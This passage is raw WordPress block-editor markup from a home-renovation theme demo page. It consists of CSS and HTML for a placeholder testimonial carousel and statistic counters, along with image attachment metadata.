Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"9a21f129\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-9a21f129 .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-9a21f129\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-9a21f129\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4f0d75da-c098-4cdc-aa7a-15fb4cfe33fb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"310f3dbd-be56-4fc5-b52f-00b541d1d06c\"} -->\n<style type=\"text/css\"> .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-310f3dbd-be56-4fc5-b52f-00b541d1d06c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-310f3dbd-be56-4fc5-b52f-00b541d1d06c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\"} -->\n<style type=\"text/css\"> .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-da6ef9f0-4404-4f62-9e1e-ca5c9d8305a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"960934cc-d8f0-4b4d-9d0a-764129efdfa3\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-960934cc-d8f0-4b4d-9d0a-764129efdfa3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\"} -->\n<style type=\"text/css\"> .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67df1bfe-896e-44c7-bd6e-6aaf6964cf1d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"bd99dc76-0eae-4a02-b907-7f82fde09603\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-bd99dc76-0eae-4a02-b907-7f82fde09603.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n 